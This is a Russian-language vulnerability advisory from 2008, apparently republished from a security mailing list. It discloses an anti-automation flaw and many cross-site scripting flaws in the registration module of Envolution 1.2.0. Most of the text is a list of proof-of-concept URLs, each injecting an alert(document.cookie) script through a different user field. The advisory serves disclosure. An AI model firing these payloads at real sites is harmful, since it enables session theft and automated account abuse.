Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20382
HistoryAug 19, 2008 - 12:00 a.m.

Multiple vulnerabilities in Envolution

2008-08-1900:00:00
vulners.com
8

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною многочисленных уязвимостях в системе
Envolution, в частности Insuficient Anti-automation и Cross-Site Scripting.

Insuficient Anti-automation:

Уязвимость в user.php (в модуле NS-NewUser).

http://websecurity.com.ua/uploads/2008/Envolution%20Insuficient%20Anti-automation.html

Можно как через POST, так и через GET:

http://site/user.php?uname=test&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уязвимости в user.php (в модуле NS-NewUser).

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/user.php?uname=test10&upass=12345&upassverif=12345&[email protected]&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвима версия Envolution 1.2.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2358/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua